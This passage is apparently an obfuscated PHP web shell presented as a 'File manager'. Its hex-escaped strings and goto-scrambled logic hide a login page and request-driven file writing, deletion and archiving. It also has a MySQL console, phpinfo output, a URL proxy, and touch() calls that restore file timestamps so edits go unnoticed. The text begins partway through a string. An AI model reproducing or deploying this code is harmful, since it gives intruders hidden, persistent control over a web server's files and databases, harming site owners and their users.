\x3c\x5c\57\x73\x63\162\x69\160\164\x3e\x5c\162\x5c\156\74\x73\x63\x72\x69\x70\x74\x20\154\141\x6e\147\x75\x61\x67\x65\75\x5c\x22\x4a\x61\x76\141\163\x63\x72\x69\160\x74\134\x22\x20\164\171\160\x65\75\134\42\x74\x65\170\164\x5c\57\152\141\166\141\163\143\x72\151\160\x74\134\x22\x3e\x5c\x72\x5c\156\145\144\x69\164\101\162\x65\141\x4c\157\x61\x64\x65\x72\56\151\156\x69\164\x28\173\x5c\162\x5c\x6e\x69\x64\72\40\134\x22\156\x65\x77\x63\157\156\164\x65\156\x74\134\x22\x5c\x72\x5c\156\x2c\144\x69\163\160\154\x61\171\x3a\x20\x5c\x22\154\x61\x74\145\162\134\x22\134\x72\x5c\x6e\x2c\x73\164\141\x72\164\137\150\x69\147\150\x6c\151\x67\150\164\72\x20\x74\x72\165\x65\134\x72\x5c\x6e\54\x61\x6c\154\157\x77\137\x72\x65\x73\151\172\145\x3a\x20\x5c\x22\x62\x6f\x74\x68\134\42\x5c\x72\134\x6e\x2c\141\x6c\154\x6f\167\137\164\x6f\147\147\154\x65\72\x20\164\x72\x75\145\134\x72\x5c\x6e\54\167\157\x72\x64\137\x77\162\141\x70\x3a\x20\x74\162\x75\x65\134\162\134\156\x2c\154\141\x6e\147\x75\141\147\145\x3a\x20\134\x22\162\165\134\42\x5c\x72\x5c\156\x2c\163\x79\x6e\x74\x61\170\72\40\x5c\42\160\150\160\x5c\42\134\164\x5c\x72\x5c\156\x2c\x74\157\157\154\x62\141\162\x3a\40\x5c\x22\x73\x65\141\162\x63\x68\x2c\x20\147\x6f\x5f\x74\x6f\137\154\x69\x6e\145\54\40\174\x2c\x20\x75\x6e\x64\157\54\40\x72\x65\144\157\54\40\x7c\x2c\x20\163\x65\x6c\x65\x63\164\x5f\146\x6f\x6e\164\x2c\x20\x7c\x2c\x20\x73\x79\156\164\x61\x78\137\x73\x65\154\x65\x63\x74\x69\157\x6e\x2c\x20\174\54\40\x63\150\x61\156\x67\145\x5f\x73\155\x6f\x6f\164\x68\x5f\x73\145\x6c\x65\143\164\151\x6f\156\54\40\150\x69\147\x68\x6c\x69\147\150\164\x2c\40\x72\145\x73\x65\x74\137\150\151\x67\x68\x6c\151\x67\150\164\54\x20\x7c\x2c\x20\x68\145\x6c\160\134\x22\x5c\x72\134\x6e\54\x73\x79\156\164\141\170\x5f\x73\145\154\x65\143\x74\x69\x6f\x6e\x5f\x61\154\154\157\x77\x3a\x20\134\42\x63\163\x73\x2c\x68\x74\x6d\x6c\x2c\x6a\163\x2c\160\x68\x70\54\160\x79\164\150\157\156\54\170\155\154\54\x63\x2c\x63\x70\x70\54\x73\161\x6c\54\x62\141\x73\x69\143\54\160\x61\x73\x5c\x22\134\x72\134\x6e\x7d\x29\x3b\x5c\x72\134\x6e\x3c\x5c\x2f\x73\143\x72\151\x70\x74\76\42\175"; goto PR1_2; qFjcg: if (file_put_contents($Kh5Cp, $_REQUEST["\x6e\145\167\x63\x6f\156\164\x65\156\164"])) { goto rNlH2; } goto Yqs7b; DBW_e: $HKiyj = true; goto y833C; jW2aM: touch($Kh5Cp, $NMa_c); goto u7ilY; Ry_63: TbRXT: goto TtZCs; xjIMI: Hrv7s: goto IeoYw; uW7UQ: bXyVP: goto B4Ikr; IM5gs: $uR23x = base64_decode($_GET["\x7a\x69\x70"]); goto jMpEk; itOf9: iBPX3: goto o3vMQ; cxNbs: echo strtoupper($BXCqO); goto maSx3; cA94W: cWe5Q: goto CHmIK; zwtj_: PKKXX: goto DLBKI; DeNA7: echo "\x22\76\xd\xa\11\11\11\x3c\57\146\x6f\162\x6d\76\15\12\x9\11"; goto C2lbT; S7xKs: VEoad: goto ZDU3V; x4pns: die; goto DDch7; qbIqH: $NMa_c = filemtime(__FILE__); goto rc42h; Zr82p: $scYTs .= "\x3c\x6f\160\x74\x69\x6f\156\40\166\x61\x6c\x75\x65\75\x22\x2d\61\x22\x3e" . NIhjE("\x53\145\154\145\x63\x74") . "\x3c\x2f\x6f\160\164\151\x6f\156\x3e\12"; goto makPD; kGEgr: if (empty($_REQUEST["\x73\x61\x76\x65"])) { goto OaJuP; } goto xHjYR; tmifO: echo "\15\xa\74\41\x64\x6f\x63\164\x79\x70\145\40\150\164\155\x6c\76\15\xa\x3c\150\164\x6d\154\76\xd\xa\74\x68\145\x61\144\76\xd\xa\74\155\x65\164\x61\40\x63\x68\141\162\163\x65\x74\x3d\x22\x75\164\x66\x2d\x38\42\x20\x2f\x3e\xd\12\74\155\145\164\x61\40\x6e\x61\x6d\145\x3d\42\x76\x69\x65\167\x70\157\x72\x74\42\x20\143\x6f\x6e\164\145\x6e\x74\x3d\42\167\x69\144\x74\150\x3d\144\x65\166\x69\143\x65\55\x77\151\144\x74\150\x2c\x20\151\x6e\x69\164\x69\141\x6c\x2d\x73\143\x61\x6c\145\75\61\x22\40\x2f\76\15\12\74\x74\x69\164\x6c\145\x3e" . nihJE("\106\151\154\x65\x20\155\141\x6e\x61\147\x65\x72") . "\74\57\164\x69\x74\154\145\76\15\12\x3c\x2f\x68\145\141\144\x3e\xd\xa\74\x62\x6f\x64\x79\x3e\15\12\74\146\x6f\162\155\x20\x61\143\164\151\x6f\156\75\x22\42\x20\155\x65\164\150\157\144\x3d\42\x70\x6f\x73\x74\42\76\15\xa" . niHJe("\114\x6f\147\x69\x6e") . "\x20\x3c\151\x6e\x70\165\x74\40\156\x61\x6d\145\75\42\154\157\x67\x69\156\x22\40\164\x79\160\145\x3d\x22\164\145\170\x74\x22\76\46\156\142\163\x70\73\x26\156\x62\x73\160\73\x26\x6e\142\163\x70\x3b\15\12" . NiHJe("\x50\x61\163\163\167\x6f\162\x64") . "\40\74\151\x6e\160\x75\164\40\x6e\141\x6d\145\x3d\42\160\x61\163\x73\x77\x6f\x72\x64\x22\x20\164\x79\160\145\75\x22\x70\x61\x73\163\167\157\162\144\42\76\x26\x6e\142\163\x70\x3b\x26\156\x62\163\x70\73\x26\156\142\x73\160\x3b\xd\12\74\151\x6e\160\165\x74\x20\x74\x79\160\x65\75\x22\x73\165\x62\x6d\x69\x74\x22\x20\x76\x61\x6c\165\145\75\x22" . NIhje("\x45\156\164\x65\x72") . "\42\x20\x63\154\141\x73\163\75\42\x66\155\137\151\156\x70\165\x74\x22\x3e\xd\12\74\57\146\157\162\x6d\76\15\12" . jXKlh($q2HJ9) . "\xd\xa\x3c\57\x62\157\x64\x79\x3e\15\12\74\x2f\x68\164\155\154\76\xd\12"; goto h7FQj; pG9Px: echo "\42\76\15\12\11\x9\x9\x9\74\57\146\x6f\162\x6d\76\15\12\x9\x9\11"; goto ChmuZ; y833C: $v4fpP = 1.4; goto xWyNz; YlYtd: $kvz02 = "\xd\xa\74\x64\151\166\40\163\x74\171\154\x65\75\x22\x70\157\x73\x69\164\151\157\x6e\x3a\x72\145\x6c\x61\x74\151\x76\x65\73\x7a\55\151\156\144\x65\x78\x3a\61\60\60\65\60\60\73\142\141\x63\153\147\162\157\165\x6e\x64\72\x20\154\151\156\145\141\162\x2d\147\162\141\x64\x69\145\x6e\164\x28\164\x6f\x20\x62\x6f\x74\x74\x6f\155\x2c\40\43\145\x34\146\65\146\x63\40\x30\x25\x2c\x23\x62\146\x65\x38\x66\x39\40\x35\x30\x25\x2c\x23\x39\146\144\70\145\x66\40\x35\61\x25\x2c\43\62\141\142\x30\145\144\40\61\60\x30\x25\x29\x3b\x22\x3e\15\xa\11\x3c\146\x6f\x72\x6d\x20\x61\143\164\151\157\x6e\x3d\42\42\40\155\145\164\150\x6f\x64\x3d\x22\107\x45\x54\42\76\xd\xa\11\74\x69\156\x70\x75\164\40\x74\171\160\145\75\x22\150\x69\x64\144\145\x6e\x22\40\156\141\x6d\145\75\42\x70\x72\x6f\x78\171\42\x20\166\x61\154\165\x65\75\42\164\x72\x75\x65\x22\76\15\12\x9" . Rsfd0() . "\x20\74\141\40\150\x72\145\x66\x3d\x22" . $JD5XC . "\42\40\164\141\162\x67\x65\x74\x3d\42\137\142\154\141\x6e\x6b\x22\x3e\125\162\154\74\57\141\x3e\72\x20\74\x69\156\160\165\x74\x20\x74\171\160\x65\75\42\164\145\x78\164\x22\40\x6e\x61\x6d\x65\75\42\x75\x72\x6c\42\40\166\x61\154\165\x65\75\x22" . $JD5XC . "\x22\40\163\151\x7a\145\75\x22\x35\65\x22\x3e\xd\12\11\74\151\x6e\160\165\164\x20\164\x79\160\145\x3d\42\x73\x75\x62\x6d\x69\164\42\40\x76\141\154\165\x65\x3d\42" . nIHJe("\123\x68\157\167") . "\x22\x20\143\154\x61\x73\163\x3d\42\146\155\137\x69\156\160\x75\x74\x22\76\15\xa\11\x3c\x2f\x66\157\x72\155\76\15\xa\x3c\57\144\151\166\x3e\xd\12"; goto qSDMH; LFd0H: z4GAy: goto YdvoT; n01Yz: echo "\x20\x7c\x20" . php_ini_loaded_file(); goto m5h2k; rz71n: $BzzRQ = json_decode($oRnJP, true); goto uRABv; rLf7W: die; goto hQQH3; bMloQ: MOe43: goto sgjo5; QPVqb: rNlH2: goto gIr26; Jok93: echo $QxlDp; goto OHzfT; p_20H: KwR5G: goto GP0Mm; dKJYB: bYkS5: goto WFgig; WZu5f: $PhGcO .= NiHje("\x45\162\x72\x6f\162\x20\157\143\x63\x75\x72\x72\x65\144"); goto qOANo; siQCk: function kiMPW() { return iWVtf() . $_SERVER["\x48\x54\124\120\x5f\110\117\123\124"]; } goto webE0; ZbB2J: goto eE_vj; goto KObIX; o3vMQ: if (empty($dVmsi["\163\150\157\167\x5f\x70\x68\x70\x5f\151\x6e\151"])) { goto WCjr9; } goto n01Yz; AHHAx: goto VEoad; goto qBaWO; Advps: PS_Cf: goto aMaAH; Y_fjj: clearstatcache(); goto IIW37; oVvFG: echo JxkLh($q2HJ9); goto QRMDP; Etann: echo "\x9\x9\x9\x3c\151\156\x70\165\x74\x20\164\171\x70\x65\75\42\x73\165\142\x6d\x69\x74\42\x20\166\x61\154\165\145\75\42"; goto OwgxT; OHzfT: echo "\42\40\57\76\xd\12\x9\11\x9\x3c\151\156\160\165\164\40\164\x79\160\x65\75\42\146\151\x6c\x65\x22\40\156\141\x6d\x65\x3d\x22\165\x70\x6c\157\x61\144\42\40\x69\144\x3d\x22\x75\x70\154\157\x61\x64\137\150\x69\144\x64\145\x6e\42\40\x73\x74\171\x6c\145\75\x22\160\x6f\x73\151\164\151\x6f\156\72\x20\x61\x62\163\x6f\x6c\165\164\145\73\40\x64\151\163\160\154\x61\x79\x3a\x20\142\x6c\157\x63\153\73\40\x6f\x76\145\x72\146\154\x6f\x77\x3a\40\x68\151\x64\144\x65\156\x3b\40\167\x69\144\x74\x68\72\40\60\73\x20\150\x65\x69\147\150\x74\72\x20\60\x3b\x20\x62\157\x72\x64\145\x72\72\x20\60\73\x20\160\x61\144\144\151\156\147\72\x20\60\x3b\x22\x20\157\x6e\143\150\x61\x6e\x67\x65\75\x22\x64\157\x63\x75\155\145\x6e\164\x2e\x67\x65\x74\x45\154\x65\155\x65\x6e\x74\x42\x79\x49\x64\50\47\x75\160\154\x6f\141\144\137\x76\151\163\151\x62\154\145\47\x29\56\166\x61\154\165\145\x20\x3d\x20\x74\x68\x69\163\56\x76\x61\x6c\x75\x65\73\x22\x20\x2f\76\15\12\11\x9\11\x3c\151\156\x70\x75\x74\40\164\171\160\x65\x3d\x22\164\x65\x78\x74\x22\40\x72\145\x61\x64\157\x6e\154\x79\x3d\42\x31\x22\x20\x69\144\75\42\165\160\154\x6f\x61\x64\x5f\166\x69\163\151\142\154\x65\42\x20\x70\154\x61\x63\145\x68\157\x6c\x64\145\x72\x3d\x22"; goto RSlW3; DRoLy: $scYTs = "\x3c\x73\x65\154\145\143\164\x20\156\x61\155\x65\75\x22" . $BXCqO . "\x5f\164\x70\x6c\x22\x20\x74\151\x74\154\145\x3d\42" . nIHJe("\x54\x65\155\160\x6c\141\x74\x65") . "\42\x20\157\156\143\150\141\x6e\147\x65\75\x22\x69\146\x20\50\x74\150\x69\x73\x2e\166\x61\154\x75\145\41\x3d\x2d\61\51\40\144\157\x63\165\155\x65\x6e\164\x2e\x66\157\x72\155\x73\x5b\x27\x63\157\156\x73\157\x6c\145\47\135\56\x65\x6c\145\155\145\x6e\164\163\133\47" . $BXCqO . "\47\135\56\x76\x61\154\x75\145\x20\x3d\x20\164\x68\151\x73\x2e\x6f\160\164\151\x6f\156\x73\x5b\163\x65\x6c\145\x63\164\x65\144\x49\x6e\144\145\x78\135\56\x76\141\154\x75\145\73\40\145\x6c\163\x65\x20\x64\x6f\x63\x75\155\x65\156\x74\x2e\146\157\x72\155\x73\x5b\47\143\157\x6e\x73\x6f\154\145\47\x5d\56\145\154\x65\x6d\x65\156\164\x73\x5b\x27" . $BXCqO . "\x27\x5d\x2e\x76\x61\154\x75\145\40\x3d\x27\47\73\42\x20\76" . "\12"; goto Zr82p; mTfcQ: echo NIHje("\x4d\141\153\145\40\144\151\162\x65\143\x74\x6f\x72\x79"); goto pG9Px; Mhsys: echo rSfd0(); goto U2MVf; mCjsC: if (!is_file($JV9b8 . "\56\x67\172")) { goto q00ly; } goto oLD6E; ecPLz: echo "\x20\x2d\x20\x44\141\x74\141\x62\141\163\x65\72\x20" . $dVmsi["\163\161\x6c\x5f\144\142"] . "\x3c\57\x68\x32\76\x3c\x2f\x74\x64\x3e\74\164\x64\76" . Gmdhs("\160\150\160"); goto uXtCJ; K8Ivx: header("\x43\157\156\x74\x65\156\x74\55\x54\171\160\145\x3a\x20\164\x65\x78\x74\x2f\150\164\155\154\x3b\x20\143\150\x61\x72\x73\145\x74\x3d\125\124\x46\x2d\70"); goto ior6_; YG6aU: HmPDK: goto ibEHu; GxkVt: goto Anzbs; goto CmUgF; wwR8I: $VHtiJ = array(); goto NR377; DdnNp: b0iNl: goto U0vMs; Xm9kj: LhKAK: goto wnRqV; vtj83: uJGnN: goto gQqDS; MYFlq: ktrt4: goto gyOUP; FjpzP: echo "\x22\x20\x2f\76\15\12\x9\x9\11\x3c\x2f\x66\x6f\162\x6d\76\15\xa\11\11"; goto Qa2t4; D4afp: Q1cMq: goto j4DZc; es_UC: echo NihjE("\x48\145\x6c\x6c\x6f"); goto fjnXZ; TtZCs: pzsFP: goto Src2s; GqwY_: goto pl9zG; goto uFUPb; nBHb3: echo "\40\74\57\x74\150\x3e\15\xa\x20\x20\40\40\74\x74\150\40\x63\x6f\x6c\163\160\141\x6e\x3d\42\x34\x22\40\x73\x74\171\x6c\145\x3d\x22\167\150\151\164\x65\x2d\x73\x70\x61\143\x65\72\x6e\x6f\167\x72\x61\x70\x22\76\x20"; goto xO7gz; zmhNA: echo nihje("\x46\x69\154\x65\40\x6d\141\156\x61\147\145\162") . "\x20\55\40" . $QxlDp; goto xnruo; QRMDP: echo "\x9\x9\74\x2f\164\x64\76\15\xa\x9\11\74\164\x72\x3e\15\xa\11\x9\74\57\x74\141\142\154\x65\76\xd\xa\40\x20\x20\x20\74\57\164\144\76\xd\12\74\x2f\164\x72\x3e\15\12\x3c\57\164\141\x62\x6c\145\x3e\15\xa\x3c\164\141\x62\x6c\x65\x20\x63\154\141\163\x73\75\42\141\154\154\42\40\x62\157\x72\144\145\162\x3d\x27\x30\x27\40\143\x65\154\154\x73\160\x61\x63\x69\156\147\75\47\61\47\40\x63\145\154\154\160\141\x64\x64\x69\156\x67\x3d\47\61\47\40\151\x64\x3d\42\146\155\x5f\x74\141\142\x6c\145\x22\x20\x77\x69\144\x74\150\x3d\x22\61\x30\x30\x25\x22\x3e\15\12\x3c\164\x68\145\x61\x64\x3e\15\xa\74\x74\x72\76\40\xd\12\40\40\40\x20\74\x74\x68\40\163\x74\171\154\x65\75\x22\167\x68\151\164\145\x2d\x73\160\x61\x63\x65\72\x6e\x6f\167\162\141\x70\x22\76\x20"; goto zW4ex; XzkI3: d2nEw: goto t1Fkx; vxplF: echo niHJe("\x4e\145\x77\40\x66\x69\x6c\x65"); goto DBMJr; dC5VG: $Kh5Cp = $QxlDp . $_REQUEST["\x65\x64\x69\164"]; goto wrdVY; FAKwP: if (empty($dVmsi["\163\x68\x6f\x77\137\x70\150\x70\x5f\166\145\x72"])) { goto iBPX3; } goto Y1CIP; yQG33: echo nihJE("\x52\151\x67\150\164\x73") . "\40\55\40" . $_REQUEST["\162\x69\147\x68\164\163"]; goto vrEEu; tLl24: if (empty($dVmsi["\155\x61\153\145\x5f\x64\x69\162\x65\143\164\157\x72\171"])) { goto ZPfln; } goto lbDP6; Fc_iL: $BFNGe = file_get_contents(__FILE__); goto gH3Ci; jOY4t: if (isset($_GET["\x64\x65\143\157\x6d\x70\162\145\x73\163"])) { goto I2JuJ; } goto yDx_9; LaK1Q: $g21yr = explode("\40", microtime()); goto l1xLc; mdMON: $OS8TV = $_POST["\146\x6d\x5f\154\x6f\147\151\x6e"]; goto DYSgt; LVwfD: echo nIhjE("\x53\x69\172\x65"); goto H1idj; lJPxF: echo niHJe("\122\x65\143\x75\x72\163\x69\x76\x65\x6c\171"); goto xyZJG; XubBK: echo "\x22\40\x2f\76\15\12\11\x9\11\x9\74\151\156\x70\165\x74\40\164\171\x70\x65\75\42\164\x65\170\164\42\x20\156\141\x6d\145\x3d\42\146\x69\x6c\145\x6e\x61\x6d\x65\x22\40\163\x69\172\x65\75\x22\x31\65\x22\76\xd\xa\11\11\11\11\74\x69\156\x70\165\x74\x20\164\x79\x70\145\75\42\163\x75\x62\x6d\151\164\x22\40\156\x61\155\x65\75\x22\x6d\x6b\146\x69\x6c\145\42\40\166\x61\154\x75\145\x3d\x22"; goto vxplF; XtI05: $dVmsi = unserialize($_COOKIE["\146\x6d\x5f\x63\157\x6e\146\x69\x67"]); goto iUBP6; webE0: function m576D($YUrxT = false) { $Mbf3m = $YUrxT ? kimPW() : "\x2e"; return $Mbf3m . "\57" . basename(__FILE__); } goto j5KuH; ixKES: echo "\40\174\x20\74\x61\x20\150\x72\145\x66\x3d\42\x3f\x70\162\x6f\170\x79\x3d\x74\162\165\145\42\76\x70\162\157\170\x79\74\x2f\x61\x3e"; goto gqeKE; t1Fkx: lzs2b: goto xMAsd; PRN3e: echo "\x9\11\11\74\x2f\x74\144\x3e\15\xa\11\x9\x9\74\x74\144\76\15\xa\11\11\11"; goto AKHwj; eAn3Y: echo $QjE85; goto x4pns; uFUPb: t0fKD: goto lqlkg; ugDzk: $s9IZn->addFile($uR23x); goto z9bkU; wiAbu: unset($_COOKIE["\146\x6d\137\x63\x6f\156\146\x69\147"]); goto GGyoL; QRqi6: $_COOKIE[$OS8TV["\143\157\157\x6b\151\x65\x5f\x6e\141\x6d\x65"]] = $OS8TV["\x6c\x6f\x67\x69\156"] . "\x7c" . md5($OS8TV["\160\x61\x73\163\167\157\x72\144"]); goto aerBc; wjqBV: if (isset($_GET["\147\172"])) { goto a9qFg; } goto jOY4t; BjLU5: if (!empty($v6aof)) { goto z1KQW; } goto WZu5f; VcrbW: unset($s9IZn); goto NuoC6; a1R8c: touch(__FILE__, $NMa_c); goto Ry_63; xyZJG: echo "\x3c\142\x72\x2f\x3e\xd\xa\40\x20\40\x20\40\40\40\40"; goto cMMBS; NNiV8: echo NIHJE("\123\x75\142\155\151\164"); goto LrzVY; Rhf_V: echo $kHeOm; goto eBwXA; Y1CIP: echo "\x20\x7c\40\120\110\120\x20" . phpversion(); goto itOf9; x2_2e: $Dr8Zp = explode("\x20", microtime()); goto AXNvt; zF31Y: echo $BXCqO; goto VLD3m; nrmjT: echo NiHJE("\x46\x69\x6c\x65\x20\155\141\x6e\x61\x67\145\x72"); goto MtfrD; fuNzP: Zphx4: goto Bp43i; SX6q1: if (empty($_COOKIE["\146\x6d\137\143\x6f\156\x66\x69\147"])) { goto zPl8a; } goto XtI05; yCESV: goto mYSB3; goto IbOYB; YEfIQ: goto LhKAK; goto yesYE; aKp1o: $OS8TV["\144\141\x79\x73\137\141\x75\164\150\x6f\162\151\x7a\141\164\x69\x6f\156"] = isset($OS8TV["\144\141\171\x73\137\x61\x75\x74\x68\x6f\162\x69\x7a\x61\x74\151\157\x6e"]) && is_numeric($OS8TV["\x64\x61\x79\x73\137\141\x75\164\150\x6f\x72\151\x7a\141\164\x69\x6f\x6e"]) ? (int) $OS8TV["\x64\141\x79\163\137\x61\165\164\x68\157\x72\x69\172\x61\164\151\157\x6e"] : 30; goto VSu9x; MOkQS: set_time_limit(0); goto AAW6j; rtdNO: xzyQI: goto gzJ5V; Z8Jzf: AojSL: goto wly35; Vbtnw: $PhGcO .= nIHje("\105\x72\162\x6f\162\x20\x6f\143\143\x75\x72\162\x65\x64"); goto f3jBE; gpOQl: $OS8TV["\x63\x6f\x6f\x6b\151\145\137\156\141\155\145"] = isset($OS8TV["\143\x6f\x6f\x6b\x69\145\137\156\141\155\x65"]) ? $OS8TV["\143\157\x6f\x6b\151\145\137\x6e\x61\155\x65"] : "\x66\x6d\137\x75\163\145\x72"; goto FVaRz; znhFj: g28WX: goto GqwY_; x3zaw: phpinfo(); goto ip2Ab; Mbjh8: VdJNf: goto XEED6; XEED6: if (!is_file($JV9b8 . "\x2e\x67\172")) { goto RK4KG; } goto r2Hoz; cmOFu: unset($vJe3R[0]); goto yJIAK; CcATF: if (empty($_REQUEST["\x73\141\x76\x65"])) { goto gju55; } goto dC5VG; Wb2hD: function vSLEe() { global $dVmsi; return new mysqli($dVmsi["\x73\x71\154\137\x73\145\x72\x76\x65\x72"], $dVmsi["\x73\161\154\x5f\x75\163\x65\162\156\141\155\145"], $dVmsi["\x73\x71\x6c\x5f\x70\141\x73\x73\x77\x6f\x72\x64"], $dVmsi["\x73\161\x6c\x5f\x64\x62"]); } goto vpUCa; wly35: natsort($VHtiJ); goto ZJ5oz; e_M0B: $JV9b8 = $uR23x . "\x2e\164\141\x72"; goto VotTi; Frsoh: echo "\x3c\x2f\164\x68\x3e\xd\xa\x3c\57\164\x72\x3e\15\12\74\x74\x72\76\15\12\40\x20\x20\40\x3c\164\x64\x20\x63\x6c\141\x73\x73\x3d\x22\x72\157\x77\x31\x22\x3e\15\xa\40\40\x20\40\x20\40\40\40"; goto HgYf9; lTKJw: ini_set("\157\x75\x74\160\x75\x74\x5f\142\x75\146\x66\145\x72\x69\x6e\x67", 0); goto fF49z; XE6xs: goto XoZoo; goto rtdNO; Pi8wu: unset($s9IZn); goto pytF5; BQyLK: goto fTAZa; goto TsbHK; meEej: echo "\x22\x3e\15\12\40\40\x20\40\40\x20\x20\x20\x20\x20\40"; goto yQG33; vzJqd: WUKpu: goto UWN0F; PdgVw: goto s4weT; goto hxgNg; oGddB: $fJXHs = "\146\x6d\137" . $BXCqO; goto BriDk; c9Lnu: echo $ag5LK; goto R9as5; hE0q9: goto lPZkb; goto MLceQ; yesYE: bxOXh: goto CjXgL; injm1: $PhGcO .= nIhje("\104\x65\x6c\x65\x74\145\x64") . "\40" . $_REQUEST["\144\x65\154\145\x74\145"]; goto FZL_z; FRbfA: $V5Ocp = array_merge($VHtiJ, $EA6Qz); goto UIl20; yDGhv: die($kvz02); goto znhFj; EC2hV: $AJyqn = str_replace("\x5c", "\x2f", realpath("\56\x2f")); goto bB9dZ; ZylFU: function HJoES($Nkgql) { return $Nkgql == "\x2e" or $Nkgql == "\x2e\56"; } goto RHG9m; Utxrp: if (!uBL0x($QxlDp . $_REQUEST["\x64\145\154\x65\164\x65"], true)) { goto fGkUp; } goto injm1; gnT_J: function JQmTR($h17u3) { goto ej10W; ej10W: global ${$h17u3 . "\x5f\164\145\155\160\154\x61\x74\145\163"}; goto E9Nth; xcB2X: $WU25W = ''; goto fPu5P; fPu5P: foreach ($vw1xF as $r4AcI => $wvp7B) { $WU25W .= "\x3c\164\x72\x3e\x3c\164\x64\40\143\x6c\141\163\x73\x3d\x22\162\157\x77\61\x22\76\x3c\x69\156\x70\165\x74\x20\x6e\141\x6d\x65\x3d\42" . $h17u3 . "\137\x6e\x61\155\x65\x5b\x5d\42\x20\166\x61\154\165\145\75\42" . $r4AcI . "\x22\76\74\57\x74\x64\x3e\x3c\164\x64\x20\143\154\141\x73\x73\75\x22\162\157\x77\x32\x20\x77\x68\157\154\145\42\x3e\x3c\164\x65\x78\x74\x61\x72\145\x61\x20\156\x61\155\145\75\42" . $h17u3 . "\x5f\x76\x61\x6c\165\x65\133\x5d\x22\x20\40\x63\157\154\163\x3d\42\65\65\42\40\x72\157\x77\x73\75\42\x35\42\x20\x63\x6c\141\163\x73\75\x22\x74\x65\x78\x74\x61\162\145\x61\137\151\156\x70\165\x74\42\x3e" . $wvp7B . "\74\57\x74\145\x78\164\141\162\x65\141\76\x20\74\151\x6e\x70\x75\164\x20\156\141\155\x65\75\42\144\145\x6c\x5f" . rand() . "\x22\x20\164\171\160\145\75\42\142\x75\x74\164\x6f\x6e\42\40\x6f\x6e\103\x6c\151\143\153\x3d\42\164\150\151\163\x2e\x70\141\x72\145\156\164\x4e\x6f\144\145\x2e\160\x61\162\145\x6e\x74\x4e\x6f\x64\145\x2e\x72\145\155\x6f\x76\145\50\x29\x3b\42\40\x76\x61\154\165\x65\x3d\42" . NIhjE("\104\x65\154\145\164\145") . "\42\57\x3e\74\57\x74\144\x3e\x3c\57\164\x72\x3e"; XjVNa: } goto M3ccd; M3ccd: TAlqF: goto dsosX; dsosX: return "\15\xa\74\164\x61\x62\x6c\x65\x3e\15\xa\74\x74\x72\76\74\164\x68\40\143\157\154\163\160\x61\156\75\42\x32\42\76" . strtoupper($h17u3) . "\x20" . nihJe("\164\145\x6d\160\154\141\164\x65\x73") . "\40" . GmDhS($h17u3) . "\x3c\x2f\164\x68\76\x3c\57\164\162\76\xd\12\74\x66\157\162\155\40\x6d\145\164\x68\157\144\75\x22\160\157\x73\x74\x22\x20\x61\143\164\151\x6f\156\75\x22\42\76\xd\12\x3c\x69\x6e\160\x75\164\x20\164\171\x70\145\x3d\42\150\x69\x64\x64\x65\156\x22\40\x76\141\154\x75\145\x3d\42" . $h17u3 . "\x22\40\x6e\141\x6d\x65\75\x22\164\x70\154\137\145\144\151\164\145\x64\x22\x3e\xd\xa\x3c\164\x72\76\x3c\164\144\x20\x63\x6c\141\x73\x73\x3d\x22\162\x6f\167\x31\x22\x3e" . niHJe("\116\x61\155\145") . "\74\x2f\164\144\76\74\164\144\x20\x63\x6c\x61\x73\x73\x3d\42\162\157\167\x32\40\x77\150\157\x6c\x65\x22\x3e" . Nihje("\x56\141\154\x75\145") . "\74\x2f\x74\144\x3e\74\x2f\x74\x72\76\xd\12" . $WU25W . "\xd\12\x3c\164\162\x3e\x3c\164\144\40\x63\157\154\163\x70\141\x6e\x3d\42\62\x22\40\143\154\141\163\x73\75\x22\x72\x6f\167\x33\x22\76\x3c\x69\x6e\x70\165\x74\40\156\x61\x6d\x65\75\42\162\x65\163\x22\x20\x74\171\x70\145\75\42\142\x75\164\164\157\x6e\42\x20\x6f\156\103\154\x69\x63\153\x3d\x22\x64\157\143\165\x6d\x65\x6e\x74\56\x6c\x6f\x63\x61\164\151\157\156\x2e\150\162\145\x66\40\75\40\x27" . m576D() . "\x3f\x66\x6d\x5f\x73\145\x74\x74\151\x6e\x67\163\75\164\162\165\145\x27\73\x22\x20\166\x61\x6c\165\145\75\x22" . nIHje("\122\145\x73\x65\164") . "\42\57\x3e\x20\x3c\151\x6e\x70\x75\x74\x20\x74\x79\160\x65\75\x22\163\165\142\x6d\x69\164\x22\40\166\x61\x6c\165\x65\75\42" . niHJE("\x53\x61\166\145") . "\x22\x20\76\74\57\164\144\x3e\x3c\x2f\164\x72\76\15\xa\74\57\146\x6f\162\x6d\x3e\xd\xa\x3c\146\x6f\162\x6d\x20\x6d\x65\164\x68\157\x64\x3d\42\x70\157\x73\x74\42\x20\141\143\164\151\157\x6e\x3d\42\x22\x3e\xd\12\x3c\151\x6e\160\x75\x74\40\164\x79\160\x65\x3d\x22\150\x69\x64\x64\145\156\x22\40\166\141\154\x75\x65\x3d\42" . $h17u3 . "\42\x20\156\x61\x6d\145\75\42\164\x70\154\x5f\x65\x64\151\x74\145\x64\x22\76\15\12\74\x74\x72\x3e\x3c\164\144\x20\143\154\x61\x73\x73\x3d\x22\162\157\167\x31\x22\x3e\x3c\x69\x6e\160\165\164\x20\x6e\141\155\x65\x3d\42" . $h17u3 . "\137\x6e\x65\167\x5f\156\141\155\145\42\40\x76\x61\x6c\x75\145\x3d\42\x22\40\x70\154\x61\143\x65\x68\157\154\x64\x65\x72\x3d\x22" . NIHJE("\x4e\x65\167") . "\x20" . nIHJE("\116\141\155\x65") . "\42\76\x3c\57\164\144\76\74\x74\x64\40\143\154\141\163\x73\x3d\x22\x72\x6f\x77\62\x20\167\x68\157\154\145\x22\x3e\x3c\x74\x65\x78\164\x61\x72\x65\141\x20\x6e\x61\x6d\x65\x3d\x22" . $h17u3 . "\137\156\x65\167\x5f\166\x61\x6c\x75\145\x22\40\40\143\x6f\x6c\x73\x3d\x22\65\x35\42\x20\x72\157\167\x73\x3d\x22\x35\x22\x20\x63\154\x61\163\163\75\x22\164\145\x78\x74\141\x72\x65\x61\x5f\151\x6e\x70\165\x74\42\x20\x70\154\141\143\x65\150\157\154\x64\x65\162\x3d\42" . NihJe("\116\145\167") . "\40" . niHjE("\126\x61\154\x75\x65") . "\42\x3e\x3c\x2f\x74\145\x78\164\141\162\145\141\76\74\57\x74\x64\76\74\x2f\164\162\76\xd\xa\74\x74\x72\x3e\x3c\x74\144\40\x63\157\154\x73\x70\x61\156\75\x22\x32\42\x20\x63\x6c\x61\163\x73\x3d\x22\162\x6f\167\63\x22\76\74\x69\156\x70\x75\x74\40\x74\171\x70\145\x3d\42\163\x75\x62\x6d\151\x74\x22\x20\166\141\154\165\x65\75\x22" . 